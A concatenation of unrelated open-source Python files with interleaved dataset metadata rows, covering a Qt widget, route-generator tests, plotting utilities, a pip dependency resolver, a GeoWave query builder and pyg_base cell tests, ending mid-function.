def widget(parent: QWidget, **kwargs) -> (QWidget, dict):
ui_context: UiContext = kwargs.get('ui_context', None)
task_manager = None if ui_context is None else ui_context.get_task_queue()
return AnnouncementDownloaderUi(sasInterface, task_manager), \
{'name': '年报下载', 'show': False}
# ----------------------------------------------------------------------------------------------------------------------
def main():
app = QApplication(sys.argv)
dlg = WrapperQDialog(AnnouncementDownloaderUi(None, None))
dlg.exec()
# ----------------------------------------------------------------------------------------------------------------------
def exception_hook(type, value, tback):
# log the exception here
print('Exception hook triggered.')
print(type)
print(value)
print(tback)
# then call the default handler
sys.__excepthook__(type, value, tback)
if __name__ == "__main__":
sys.excepthook = exception_hook
try:
main()
except Exception as e:
print('Error =>', e)
print('Error =>', traceback.format_exc())
exit()
finally:
pass
| 39.099638
| 195
| 0.580874
| 16,332
| 0.733792
| 0
| 0
| 7,540
| 0.33877
| 0
| 0
| 6,969
| 0.313115
|
a23e80a2bc9c75ffcdcaee541fdcd296843ceb25
| 1,109
|
py
|
Python
|
tests/routes/generators/test_random.py
|
pedrofreitascampospro/locintel
|
eb9c56cdc308660c31d90abe9fe62bd3634ba273
|
[
"MIT"
] | null | null | null |
tests/routes/generators/test_random.py
|
pedrofreitascampospro/locintel
|
eb9c56cdc308660c31d90abe9fe62bd3634ba273
|
[
"MIT"
] | null | null | null |
tests/routes/generators/test_random.py
|
pedrofreitascampospro/locintel
|
eb9c56cdc308660c31d90abe9fe62bd3634ba273
|
[
"MIT"
] | null | null | null |
import random
import shapely.geometry as sg
from locintel.quality.generators.random import RandomRoutePlanGenerator, polygons
random.seed(10)
class TestRandomRoutePlanGenerator(object):
def test_random_route_plan_generator(self):
polygon = polygons["berlin"]
generator = RandomRoutePlanGenerator()
route_plan = generator.generate_route(polygon)
assert polygon.contains(sg.Point(route_plan.start.lng, route_plan.start.lat))
assert polygon.contains(sg.Point(route_plan.end.lng, route_plan.end.lat))
assert generator.name == "random"
def test_random_route_plan_generator_accepts_identifier(self):
polygon = polygons["berlin"]
generator = RandomRoutePlanGenerator()
identifier = "id1"
route_plan = generator.generate_route(polygon, identifier=identifier)
assert polygon.contains(sg.Point(route_plan.start.lng, route_plan.start.lat))
assert polygon.contains(sg.Point(route_plan.end.lng, route_plan.end.lat))
assert route_plan.identifier == identifier
assert generator.name == "random"
| 35.774194
| 85
| 0.733093
| 962
| 0.867448
| 0
| 0
| 0
| 0
| 0
| 0
| 37
| 0.033363
|
a23ebe170e2650bcc75fd785f5c11d3fba8249e1
| 3,878
|
py
|
Python
|
curtin-rci/local_utils.py
|
Curtin-Open-Knowledge-Initiative/mag_coverage_report
|
a75dd1273c44895b5c857ebd498407aa95bd45e5
|
[
"Apache-2.0"
] | null | null | null |
curtin-rci/local_utils.py
|
Curtin-Open-Knowledge-Initiative/mag_coverage_report
|
a75dd1273c44895b5c857ebd498407aa95bd45e5
|
[
"Apache-2.0"
] | 2
|
2021-08-30T11:52:25.000Z
|
2021-09-02T12:11:05.000Z
|
curtin-rci/local_utils.py
|
Curtin-Open-Knowledge-Initiative/mag_coverage_report
|
a75dd1273c44895b5c857ebd498407aa95bd45e5
|
[
"Apache-2.0"
] | 3
|
2021-07-04T07:39:01.000Z
|
2021-08-24T15:24:29.000Z
|
import pandas as pd
import plotly.graph_objects as go
from typing import Union, Optional
from pathlib import Path
def collate_time(df: pd.DataFrame,
columns: Union[str, list[str]],
year_range: Union[list, tuple]):
if type(columns) == str:
columns = [columns]
if type(year_range) == tuple:
year_range = range(*year_range)
filtered = df[df.published_year.isin(year_range)]
return_df = filtered[['school', 'total_outputs'] + columns].groupby('school').sum()
return_df.reset_index(inplace=True)
return_df['published_year'] = f'{year_range[0]}-{year_range[-1]}'
return return_df
def rci_scatter(df: pd.DataFrame,
x: Union[str, list[str]],
y: Union[str, list[str]],
color: Optional[str] = None,
title: Optional[str] = None,
fig: Optional[go.Figure] = None,
show: Optional[bool] = True,
**kwargs) -> go.Figure:
if not fig:
fig = go.Figure()
if type(x) == str:
x = [x]
if type(y) == str:
y = [y]
if len(x) == len(y):
xys = zip(x, y)
elif len(x) == 1 and len(y) > 1:
xys = [(x, ys) for ys in y]
else:
raise ValueError('X and Y lists need to be equal lengths or x to be a single variable')
for xs, ys in xys:
df['ys'] = [ys] * len(df)
fig.add_trace(go.Scatter(
x=df[xs],
y=df[ys],
mode='markers',
marker_color=df[color] if color else None,
customdata=df[['school', 'published_year', 'ys']],
hovertemplate=
"""School: %{customdata[0]}
Year: %{customdata[1]}
RCI Group: %{customdata[2]}
x: %{x}
y: %{y}"""
))
if title:
fig.update_layout(title=title)
fig.update_layout(xaxis_title='ERA18 RCI Groups')
fig.update_layout(yaxis_title='MAG-based RCI Groups')
if show:
fig.show()
return fig
DATA_FOLDER = Path('data_files')
MAIN_SCHOOLS = [
'Curtin Law School',
'Curtin Medical School',
'School of Accounting, Economics and Finance',
'School of Allied Health',
'School of Civil and Mechanical Engineering',
'School of Design and the Built Environment',
'School of Earth and Planetary Sciences',
'School of Education',
'School of Elec Eng, Comp and Math Sci',
'School of Management & Marketing',
'School of Media, Creative Arts and Social Inquiry',
'School of Molecular and Life Sciences',
'School of Nursing',
'School of Population Health',
'WASM Minerals, Energy and Chemical Engineering',
'Not Assigned'
]
CITATION_SCHOOLS = [
'Curtin Medical School',
'School of Allied Health',
'School of Civil and Mechanical Engineering',
'School of Earth and Planetary Sciences',
'School of Elec Eng, Comp and Math Sci',
'School of Molecular and Life Sciences',
'School of Nursing',
'School of Population Health',
'WASM Minerals, Energy and Chemical Engineering',
]
FIELD_METRIC_COLUMNS = [ #'magy_rci_group_0', 'magy_rci_group_I',
# 'magy_rci_group_II', 'magy_rci_group_III', 'magy_rci_group_IV',
# 'magy_rci_group_V', 'magy_rci_group_VI',
'magy_centile_1',
'magy_centile_5', 'magy_centile_10', 'magy_centile_25',
'magy_centile_50', 'magy_centile_other']
JOURNAL_METRIC_COLUMNS = ['rci_group_0', 'rci_group_I',
'rci_group_II', 'rci_group_III', 'rci_group_IV',
'rci_group_V', 'rci_group_VI', 'mag_centile_1',
'mag_centile_5', 'mag_centile_10', 'mag_centile_25',
'mag_centile_50', 'mag_centile_other']
| 33.721739
| 95
| 0.57968
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,720
| 0.443528
|
a23fbcb063477231d30f7934e898ac5453872dde
| 2,492
|
py
|
Python
|
scripts/pa-loaddata.py
|
kbase/probabilistic_annotation
|
2454925ca98c80c73bda327a0eff8aed94c5a48d
|
[
"MIT"
] | null | null | null |
scripts/pa-loaddata.py
|
kbase/probabilistic_annotation
|
2454925ca98c80c73bda327a0eff8aed94c5a48d
|
[
"MIT"
] | null | null | null |
scripts/pa-loaddata.py
|
kbase/probabilistic_annotation
|
2454925ca98c80c73bda327a0eff8aed94c5a48d
|
[
"MIT"
] | null | null | null |
#! /usr/bin/python
import argparse
import os
from biokbase.probabilistic_annotation.DataParser import DataParser
from biokbase.probabilistic_annotation.Helpers import get_config
from biokbase import log
desc1 = '''
NAME
pa-loaddata -- load static database of gene annotations
SYNOPSIS
'''
desc2 = '''
DESCRIPTION
Load the static database of high-quality gene annotations along with
files containing intermediate data. The files are then available for
a probabilistic annotation server on this system. Since downloading
from Shock can take a long time, run this command to load the static
database files before the server is started. The configFilePath argument
specifies the path to the configuration file for the service.
Note that a probabilistic annotation server is unable to service client
requests for the annotate() and calculate() methods while this command is
running and must be restarted to use the new files.
'''
desc3 = '''
EXAMPLES
Load static database files:
> pa-loaddata loaddata.cfg
SEE ALSO
pa-gendata
pa-savedata
AUTHORS
Matt Benedict, Mike Mundy
'''
# Main script function
if __name__ == "__main__":
# Parse arguments.
parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, prog='pa-loaddata', epilog=desc3)
parser.add_argument('configFilePath', help='path to configuration file', action='store', default=None)
usage = parser.format_usage()
parser.description = desc1 + ' ' + usage + desc2
parser.usage = argparse.SUPPRESS
args = parser.parse_args()
# Create a log object.
submod = os.environ.get('KB_SERVICE_NAME', 'probabilistic_annotation')
mylog = log.log(submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, config=args.configFilePath)
# Get the probabilistic_annotation section from the configuration file.
config = get_config(args.configFilePath)
# Create a DataParser object for working with the static database files (the
# data folder is created if it does not exist).
dataParser = DataParser(config)
# Get the static database files. If the files do not exist and they are downloaded
# from Shock, the command may run for a long time.
testDataPath = os.path.join(os.environ['KB_TOP'], 'services', submod, 'testdata')
dataOption = dataParser.getDatabaseFiles(mylog, testDataPath)
exit(0)
| 34.611111
| 124
| 0.726726
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,511
| 0.60634
|
a2408683ebb50640f78f65bb066c73360bbad5e1
| 21,441
|
py
|
Python
|
pippin.py
|
harlowja/pippin
|
e101ad867ea9982457374281a2050c30020b10f4
|
[
"Apache-2.0"
] | null | null | null |
pippin.py
|
harlowja/pippin
|
e101ad867ea9982457374281a2050c30020b10f4
|
[
"Apache-2.0"
] | null | null | null |
pippin.py
|
harlowja/pippin
|
e101ad867ea9982457374281a2050c30020b10f4
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright (C) 2015 Yahoo! Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import print_function
try:
from collections import OrderedDict # noqa
except ImportError:
from ordereddict import OrderedDict # noqa
import collections
import contextlib
import hashlib
import json
import logging
import os
import shutil
import sys
import tempfile
# TODO: get rid of this...
from taskflow.types import tree
from distutils import version as dist_version
import argparse
import networkx as nx
from pip import req as pip_req
from pkgtools.pypi import PyPIJson
from pkgtools.pypi import real_name as pypi_real_name
import requests
import six
LOG = logging.getLogger('pippin')
# Default URL downloading/fetching timeout...
TIMEOUT = 5.0
try:
from pip import util as pip_util # noqa
except ImportError:
from pip import utils as pip_util # noqa
class RequirementException(Exception):
pass
class NotFoundException(Exception):
pass
def parse_line(line, path=None):
from_where = ''
if path:
from_where = " -> ".join(str(r.req) for r in path)
from_where = from_where.strip()
if not from_where:
from_where = "???"
if line.startswith('-e') or line.startswith('--editable'):
if line.startswith('-e'):
line = line[2:].strip()
else:
line = line[len('--editable'):].strip().lstrip('=')
req = pip_req.InstallRequirement.from_editable(line,
comes_from=from_where)
else:
req = pip_req.InstallRequirement.from_line(line,
comes_from=from_where)
return req
class DiGraph(nx.DiGraph):
"""A directed graph subclass with useful utility functions."""
def __init__(self, data=None, name=''):
super(DiGraph, self).__init__(name=name, data=data)
self.frozen = False
def add_edge_not_same(self, n1, n2):
if n1 == n2:
return
else:
self.add_edge(n1, n2)
def pformat(self):
"""Pretty formats your graph into a string.
This pretty formatted string representation includes many useful
details about your graph, including; name, type, frozeness, node count,
nodes, edge count, edges, graph density and graph cycles (if any).
"""
lines = []
lines.append("Name: %s" % self.name)
lines.append("Type: %s" % type(self).__name__)
lines.append("Frozen: %s" % nx.is_frozen(self))
lines.append("Nodes: %s" % self.number_of_nodes())
for n in self.nodes_iter():
lines.append(" - %s" % n)
lines.append("Edges: %s" % self.number_of_edges())
for (u, v, e_data) in self.edges_iter(data=True):
if e_data:
lines.append(" %s -> %s (%s)" % (u, v, e_data))
else:
lines.append(" %s -> %s" % (u, v))
lines.append("Density: %0.3f" % nx.density(self))
cycles = list(nx.cycles.recursive_simple_cycles(self))
lines.append("Cycles: %s" % len(cycles))
for cycle in cycles:
buf = six.StringIO()
buf.write("%s" % (cycle[0]))
for i in range(1, len(cycle)):
buf.write(" --> %s" % (cycle[i]))
buf.write(" --> %s" % (cycle[0]))
lines.append(" %s" % buf.getvalue())
return os.linesep.join(lines)
_MatchedRelease = collections.namedtuple('_MatchedRelease',
['string_version',
'parsed_version',
'origin_url',
'origin_filename',
'origin_size'])
def req_key(req):
return req.req.key
@contextlib.contextmanager
def tempdir(**kwargs):
# This seems like it was only added in python 3.2
# Make it since its useful...
# See: http://bugs.python.org/file12970/tempdir.patch
tdir = tempfile.mkdtemp(**kwargs)
try:
yield tdir
finally:
shutil.rmtree(tdir)
def check_is_compatible_alongside(pkg_req, gathered):
# If we conflict with the currently gathered requirements, give up...
for req_name, other_req in six.iteritems(gathered):
if req_key(pkg_req) == req_name:
if pkg_req.details['version'] not in other_req.req:
raise RequirementException("'%s==%s' not in '%s'"
% (pkg_req.details['name'],
pkg_req.details['version'],
other_req))
def create_parser():
parser = argparse.ArgumentParser()
parser.add_argument(
"-r", "--requirement",
dest="requirements",
nargs="+",
default=[],
metavar="<file>",
help="Analyze all the packages listed in the given requirements file")
parser.add_argument(
"-s", "--scratch",
dest="scratch",
default=os.getcwd(),
metavar="<path>",
help="Scratch path (used for caching downloaded data)"
" [default: %s]" % (os.getcwd()))
parser.add_argument(
"-v", "--verbose",
dest="verbose",
action='store_true',
default=False,
help="Enable verbose output")
parser.add_argument(
"-t", "--timeout",
dest="timeout",
type=float,
default=float(TIMEOUT),
help="Connection timeout (default: %s)" % TIMEOUT)
return parser
def download_url_to(url, options, save_path):
LOG.debug("Downloading '%s' -> '%s' (timeout=%s)",
url, save_path, options.timeout)
resp = requests.get(url, timeout=options.timeout)
with open(save_path, 'wb') as fh:
fh.write(resp.content)
return resp.content
def parse_requirements(options):
requirements = OrderedDict()
for filename in options.requirements:
try:
entries = list(pip_req.parse_requirements(filename))
for req in reversed(entries):
if req_key(req) in requirements:
raise ValueError("Currently only one requirement for '%s'"
" is allowed, merging is not currently"
" supported" % req_key(req))
requirements[req_key(req)] = req
except Exception as ex:
raise IOError("Cannot parse '%s': %s" % (filename, ex))
return requirements
class EggDetailer(object):
def __init__(self, options):
self.options = options
self.egg_cache = {}
self.egg_fail_cache = {}
def _get_directory_details(self, path):
if not os.path.isdir(path):
raise IOError("Can not detail non-existent directory %s" % (path))
req = parse_line(path)
req.source_dir = path
req.run_egg_info()
dependencies = []
for d in req.requirements():
if not d.startswith("-e") and d.find("#"):
d = d.split("#")[0]
d = d.strip()
if d:
dependencies.append(d)
details = {
'req': req.req,
'dependencies': dependencies,
'name': req.name,
'pkg_info': req.pkg_info(),
'dependency_links': req.dependency_links,
'version': req.installed_version,
}
return details
def _get_archive_details(self, filename, filesize):
if not os.path.isfile(filename):
raise IOError("Can not detail non-existent file %s" % (filename))
cache_key = "f:%s:%s" % (os.path.basename(filename), filesize)
if cache_key in self.egg_fail_cache:
exc_type, exc_value, exc_traceback = self.egg_fail_cache[cache_key]
six.reraise(exc_type, exc_value, exc_traceback)
try:
return self.egg_cache[cache_key]
except KeyError:
with tempdir() as a_dir:
arch_filename = os.path.join(a_dir, os.path.basename(filename))
shutil.copyfile(filename, arch_filename)
extract_to = os.path.join(a_dir, 'build')
os.makedirs(extract_to)
pip_util.unpack_file(arch_filename, extract_to,
content_type='', link='')
try:
details = self._get_directory_details(extract_to)
except Exception:
# Don't bother saving the traceback (we don't care
# about it...)
exc_type, exc_value, exc_traceback = sys.exc_info()
self.egg_fail_cache[cache_key] = (exc_type,
exc_value, None)
raise
else:
self.egg_cache[cache_key] = details
return details
def fetch(self, req):
origin_filename = req.origin_filename
origin_url = req.origin_url
download_path = os.path.join(self.options.scratch,
'.download', origin_filename)
if not os.path.exists(download_path):
download_url_to(origin_url, self.options, download_path)
return self._get_archive_details(download_path, req.origin_size)
class PackageFinder(object):
MAX_VERSIONS = 5
def __init__(self, options):
self.options = options
self.no_sdist_cache = set()
self.no_parse_cache = set()
def match_available(self, pkg_req, path=None):
looked_in = []
useables = []
available = self._find_releases(req_key(pkg_req))
req = pkg_req.req
for a in reversed(available):
v = a.string_version
if v in req:
line = "%s==%s" % (req_key(pkg_req), v)
m_req = parse_line(line, path=path)
m_req.origin_url = a.origin_url
m_req.origin_filename = a.origin_filename
m_req.origin_size = a.origin_size
useables.append(m_req)
if len(useables) == self.MAX_VERSIONS:
break
else:
looked_in.append(v)
if not useables:
raise NotFoundException("No requirement found that"
" matches '%s' (tried %s)" % (pkg_req,
looked_in))
else:
return useables
def _find_releases(self, pkg_name):
def req_func(url, timeout=None):
LOG.debug("Downloading '%s' (timeout=%s)", url, timeout)
r = requests.get(url, timeout=timeout)
return r.content
def sorter(r1, r2):
return cmp(r1[1], r2[1])
version_path = os.path.join(self.options.scratch,
".versions", "%s.json" % pkg_name)
if os.path.exists(version_path):
with open(version_path, 'rb') as fh:
pkg_data = json.loads(fh.read())
else:
real_pkg_name = pypi_real_name(pkg_name,
timeout=self.options.timeout)
if not real_pkg_name:
raise ValueError("No pypi package named '%s' found" % pkg_name)
pypi = PyPIJson(real_pkg_name, fast=True)
pypi_data = pypi.retrieve(timeout=self.options.timeout,
req_func=req_func)
pkg_data = {}
releases = pypi_data.get('releases', {})
for version, release_urls in six.iteritems(releases):
if not release_urls:
continue
pkg_data[version] = release_urls
if not pkg_data:
raise ValueError("No pypi package release information for"
" '%s' found" % pkg_name)
with open(version_path, 'wb') as fh:
fh.write(json.dumps(pkg_data, indent=4))
releases = []
for version, release_urls in six.iteritems(pkg_data):
rel = rel_fn = rel_size = None
for r in release_urls:
if r['packagetype'] == 'sdist':
rel = r['url']
rel_fn = r['filename']
rel_size = r['size']
rel_identity = "%s==%s" % (pkg_name, version)
if not all([rel, rel_fn, rel_size]):
if rel_identity not in self.no_sdist_cache:
LOG.warn("No sdist found for '%s==%s'", pkg_name, version)
self.no_sdist_cache.add(rel_identity)
else:
try:
m_rel = _MatchedRelease(
version, dist_version.LooseVersion(version),
rel, rel_fn, rel_size)
releases.append(m_rel)
except ValueError:
if rel_identity not in self.no_parse_cache:
LOG.warn("Failed parsing '%s==%s'", pkg_name, version,
exc_info=True)
self.no_parse_cache.add(rel_identity)
return sorted(releases, cmp=sorter)
class DeepExpander(object):
def __init__(self, finder, detailer, options):
self.options = options
self.finder = finder
self.detailer = detailer
self.egg_fail_cache = set()
def expand_many(self, pkg_reqs):
graph = DiGraph()
pkg_direct_deps = []
for pkg_req in pkg_reqs:
path = [pkg_req]
pkg_direct_deps.append(self._expand(pkg_req, graph, path))
for pkg_req, direct_deps in zip(pkg_reqs, pkg_direct_deps):
graph.add_node(pkg_req.req, req=pkg_req)
for m in direct_deps:
graph.add_edge_not_same(pkg_req.req, m.req)
return graph
def _expand(self, pkg_req, graph, path):
if graph.has_node(pkg_req.req):
return [pkg_req]
else:
LOG.debug("Expanding matches for %s", pkg_req)
graph.add_node(pkg_req.req, req=pkg_req)
useables = []
for m in self.finder.match_available(pkg_req, path=path):
if not hasattr(m, 'details'):
try:
m.details = self.detailer.fetch(m)
except Exception as e:
if m.req not in self.egg_fail_cache:
LOG.warn("Failed detailing '%s'", m)
e_blob = str(e)
for line in e_blob.splitlines():
LOG.warn(line)
self.egg_fail_cache.add(m.req)
if not hasattr(m, 'details'):
continue
useables.append(m)
if m.req == pkg_req.req:
continue
else:
new_path = path[:]
new_path.append(m)
graph.add_node(m.req, req=m, exact=True)
graph.add_edge_not_same(pkg_req.req, m.req)
for dep in m.details['dependencies']:
dep_req = parse_line(dep, path=new_path)
new_path.append(dep_req)
dep_sols = []
for dep_sol in self._expand(dep_req, graph, new_path):
dep_sols.append(dep_sol)
graph.add_edge_not_same(m.req, dep_sol.req)
if not dep_sols:
raise ValueError("No solutions found for required"
" dependency '%s' for '%s'"
" (originating from requirement '%s')"
% (dep_req, m, pkg_req))
else:
new_path.pop()
if not useables:
raise ValueError("No working solutions found for required"
" requirement '%s'" % (pkg_req))
return useables
def expand(requirements, options):
if not requirements:
return {}
print("Expanding all requirements dependencies (deeply) and"
" finding matching versions that will be installable into a"
" directed graph...")
print("Please wait...")
# Cache it in the scratch dir to avoid recomputing...
buf = six.StringIO()
for (pkg_name, pkg_req) in six.iteritems(requirements):
buf.write(pkg_req.req)
buf.write("\n")
graph_name = hashlib.md5(buf.getvalue().strip()).hexdigest()
graph_name += str(PackageFinder.MAX_VERSIONS)
graph_pickled_filename = os.path.join(
options.scratch, '.graphs', "%s.gpickle" % graph_name)
if os.path.exists(graph_pickled_filename):
print("Loading prior graph from '%s" % graph_pickled_filename)
return nx.read_gpickle(graph_pickled_filename)
else:
finder = PackageFinder(options)
detailer = EggDetailer(options)
graph = DiGraph(name=graph_name)
expander = DeepExpander(finder, detailer, options)
graph = expander.expand_many(list(six.itervalues(requirements)))
nx.write_gpickle(graph, graph_pickled_filename)
return graph
def tree_generator(root, graph, parent=None):
children = list(graph.successors_iter(root))
if parent is None:
parent = tree.Node(root, **graph.node[root])
for child in children:
node = tree.Node(child, **graph.node[child])
parent.add(node)
tree_generator(child, graph, parent=node)
return parent
def resolve(requirements, graph, options):
def _is_exact(req):
if len(req.specs) == 0:
return False
equals = 0
for (op, _ver) in req.specs:
if op == "==":
equals += 1
if equals == len(req.specs):
return True
return False
solutions = OrderedDict()
for pkg_name, pkg_req in six.iteritems(requirements):
LOG.debug("Generating the solution paths for '%s'", pkg_req)
node = tree_generator(pkg_req.req, graph)
solutions[pkg_name] = node
node_paths = []
for sub_node in node:
leaves = []
for n in sub_node.dfs_iter():
if not n.child_count():
leaves.append(n)
paths = []
for n in leaves:
path = []
for p_n in n.path_iter():
if _is_exact(p_n.item):
path.insert(0, p_n.item)
if p_n is sub_node:
break
paths.append(path)
if not paths:
if _is_exact(sub_node.item):
paths.append([sub_node.item])
else:
raise RuntimeError("No solution paths found for '%s'"
% sub_node.item)
LOG.debug("%s solution paths found for '%s' (solution"
" for '%s') found", len(paths), sub_node.item, pkg_req)
for i, path in enumerate(paths):
LOG.debug("Solution path %s:", i)
for p in path:
LOG.debug(" - %s" % p)
node_paths.append(paths)
return {}
def setup_logging(options):
if options.verbose:
logging.basicConfig(level=logging.DEBUG,
format='%(levelname)s: @%(name)s : %(message)s',
stream=sys.stdout)
else:
logging.basicConfig(level=logging.INFO,
format='%(levelname)s: @%(name)s : %(message)s',
stream=sys.stdout)
req_logger = logging.getLogger('requests')
req_logger.setLevel(logging.WARNING)
def main():
def req_cmp(a, b):
return cmp(req_key(a), req_key(b))
parser = create_parser()
options = parser.parse_args()
if not options.requirements:
parser.error("At least one requirement file must be provided")
setup_logging(options)
initial = parse_requirements(options)
for d in ['.download', '.versions', '.graphs']:
scratch_path = os.path.join(options.scratch, d)
if not os.path.isdir(scratch_path):
os.makedirs(scratch_path)
print("Initial package set:")
for r in sorted(list(six.itervalues(initial)), cmp=req_cmp):
print(" - %s" % r)
graph = expand(initial, options)
if options.verbose:
print(graph.pformat())
resolved = resolve(initial, graph, options)
print("Resolved package set:")
for r in sorted(list(six.itervalues(resolved)), cmp=req_cmp):
print(" - %s" % r)
if __name__ == "__main__":
main()
| 37.223958
| 79
| 0.54671
| 11,402
| 0.531785
| 275
| 0.012826
| 302
| 0.014085
| 0
| 0
| 3,572
| 0.166597
|
a2431b76a7fd7273de98b3d8241bb7216ee7d296
| 2,182
|
py
|
Python
|
python/src/main/python/pygw/query/aggregation_query_builder.py
|
radiant-maxar/geowave
|
2d9f39d32e4621c8f5965a4dffff0623c1c03231
|
[
"Apache-2.0"
] | 280
|
2017-06-14T01:26:19.000Z
|
2022-03-28T15:45:23.000Z
|
python/src/main/python/pygw/query/aggregation_query_builder.py
|
radiant-maxar/geowave
|
2d9f39d32e4621c8f5965a4dffff0623c1c03231
|
[
"Apache-2.0"
] | 458
|
2017-06-12T20:00:59.000Z
|
2022-03-31T04:41:59.000Z
|
python/src/main/python/pygw/query/aggregation_query_builder.py
|
radiant-maxar/geowave
|
2d9f39d32e4621c8f5965a4dffff0623c1c03231
|
[
"Apache-2.0"
] | 135
|
2017-06-12T20:39:34.000Z
|
2022-03-15T13:42:30.000Z
|
#
# Copyright (c) 2013-2020 Contributors to the Eclipse Foundation
#
# See the NOTICE file distributed with this work for additional information regarding copyright
# ownership. All rights reserved. This program and the accompanying materials are made available
# under the terms of the Apache License, Version 2.0 which accompanies this distribution and is
# available at http://www.apache.org/licenses/LICENSE-2.0.txt
# ===============================================================================================
from .base_query_builder import BaseQueryBuilder
from .aggregation_query import AggregationQuery
from ..base.type_conversions import StringArrayType
class AggregationQueryBuilder(BaseQueryBuilder):
"""
A builder for creating aggregation queries. This class should not be used directly. Instead, use one of the derived
classes such as `pygw.query.vector.VectorAggregationQueryBuilder`.
"""
def __init__(self, java_ref):
super().__init__(java_ref)
def count(self, *type_names):
"""
This is a convenience method to set the count aggregation if no type names are given it is
assumed to count every type.
Args:
type_names (str): The type names to count results.
Returns:
This query builder.
"""
if type_names is None:
self._java_ref.count()
else:
self._java_ref.count(StringArrayType().to_java(type_names))
return self
def aggregate(self, type_name, j_aggregation):
"""
Provide the Java Aggregation function and the type name to apply the aggregation on.
Args:
type_name (str): The type name to aggregate.
j_aggregation (Aggregation): The Java aggregation function to
Returns:
This query builder.
"""
return self._java_ref.aggregate(type_name, j_aggregation)
def build(self):
"""
Builds the configured aggregation query.
Returns:
The final constructed `pygw.query.AggregationQuery`.
"""
return AggregationQuery(self._java_ref.build(), self._java_transformer)
| 35.193548
| 120
| 0.651696
| 1,510
| 0.692026
| 0
| 0
| 0
| 0
| 0
| 0
| 1,442
| 0.660862
|
a243a526c6890fd80b3908d73d1ec8bf0226c2b2
| 6,059
|
py
|
Python
|
tests/test_cells.py
|
nclarey/pyg-base
|
a7b90ea2ad4d740d8e7f8c4a7c9d341d36373862
|
[
"MIT"
] | null | null | null |
tests/test_cells.py
|
nclarey/pyg-base
|
a7b90ea2ad4d740d8e7f8c4a7c9d341d36373862
|
[
"MIT"
] | null | null | null |
tests/test_cells.py
|
nclarey/pyg-base
|
a7b90ea2ad4d740d8e7f8c4a7c9d341d36373862
|
[
"MIT"
] | null | null | null |
from pyg_base import acell, cell, cell_func, dictattr, dt, getargspec, passthru, add_, get_cache
from pyg_base._cell import cell_output, cell_item, cell_inputs, _updated
import pytest
from pyg_base import *
def test_cell():
c = cell(lambda a:a+1)
assert cell_output(c) == ['data']
with pytest.raises(TypeError):
c.go()
c.a = 1
assert c.go().data == 2
assert c().data == 2
assert isinstance(c, dictattr)
def test_cell_go():
c = cell(a = 1)
assert c.go()- _updated == c
a = cell(lambda a: a +1 , a = 1, output = 'b')
a = a.go()
assert a.b == 2
f = lambda a: dict(a3 = a+3, a1 = a+1)
f.output = ['a3', 'a1']
b = cell(f, a = 1)
assert cell_output(b) == f.output
b = b.go()
assert b.a3 == 4 and b.a1 == 2
def test_cell_of_cell():
a = cell(a = 1)
b = cell(data = 2)
self = cell(lambda a,b:a+b, a = a, b=b)
assert self.go().data == 3
def test_cell_fullargspec():
function = lambda a, b = 1, **some_params: 1
assert cell(function).fullargspec == getargspec(function)
def test_cell_func_cell():
f = cell_func(lambda a, b: a+b, unitemized = ['a', 'b'])
a = cell(a = 1)
b = cell(b = 2)
c = cell(f, a = a, b = b)
c = c.go()
assert c.data - _updated == cell(a = 1) + cell(b=2)
a = cell(lambda a: a * 3, a = 1)
b = cell(lambda b: b * 3, b = 2)
c = cell(f, a = a, b = b)
c = c.go()
assert c.data - _updated == (a.go() + b.go()) - _updated
f = cell_func(lambda a, b: a+b, unitemized = ['a', 'b'], uncalled = ['a', 'b'])
c = cell(f, a = a, b = b)
c = c.go()
assert c.data - _updated == (a + b) - _updated
f = cell_func(lambda a, b: a+b)
c = cell(f, a = a, b = b)
c = c.go()
assert c.data == (a.go().data + b.go().data)
f = cell_func(lambda a, b: a+b, uncalled = ['a', 'b'])
c = cell(f, a = a, b = b)
c = c.go()
assert c.data == (a.a + b.b)
def test_cell_func_relabel():
a = cell(passthru, data = 1, a = dict(b = 3), c = [1,2,3])
res = cell_func(add_, a = 'a.b')(a, 1)
assert res[0] == 4 # should pull a['a']['b'] from a
res = cell_func(add_)(a, 1)
assert res[0] == 2 # should pull data
res = cell_func(add_, a = ['c', 1])(a, 1)
assert res[0] == 3 #should pick the '2' from c
res = cell_func(add_, a = ['c', 1])(a, 0)
assert res[0] == 2 #should pick the '1' from c
def test_cell_output():
c = cell()
assert cell_output(c) == ['data']
function = lambda : dict(a = 1, b = 2)
function.output = ['a','b']
c.function = function
assert cell_output(c) == ['a', 'b']
c.function = lambda a: a
assert cell_output(c) == ['data']
def test_cell_item():
d = dict(a = 1)
assert cell_item(d) == d
d = cell(a = 1)
with pytest.raises(KeyError):
assert cell_item(d)
d = cell(a = 1, data = 2)
assert cell_item(d) == 2
assert cell_item(d, 'whatever you put here') == 2
d.output = ['data', 'b']
assert cell_item(d, 'crap') == 2
assert cell_item(d) == 2
d.output = ['b', 'data']
with pytest.raises(KeyError):
cell_item(d, 'crap')
with pytest.raises(KeyError):
cell_item(d, 'b')
with pytest.raises(KeyError):
cell_item(d)
d.output = ['data', 'a']
assert cell_item(d, 'crap') == 2
assert cell_item(d) == 2
assert cell_item(d, 'a') == 1
def test_cell_init():
c = cell(a = 1, b = 2)
assert cell(c) == c
c = cell(lambda a, b: a+ b, a = 1, b = 2)
assert cell(c) == c
d = dict(c)
assert cell(d, x = 5) == c + dict(x = 5)
assert c().data == 3
assert cell_item(c()) == 3
with pytest.raises(KeyError):
cell_item(c)
def test_cell_item_tree():
c = cell(a = dict(b = 1), output = ['a.b'])
assert cell_item(c) == 1
c = cell(a = 1, output = 'a')
assert c._output == ['a']
assert not c.run()
c = cell(a = 1, output = ['a'])
assert c._output == ['a']
assert not c.run()
assert c.__repr__() == "cell\n{'a': 1, 'function': None, 'output': ['a']}"
def test_cell_go_levels():
def f(t1 = None, t2 = None):
_ = [i for i in range(100000)]
return max([dt(t1), dt(t2)])
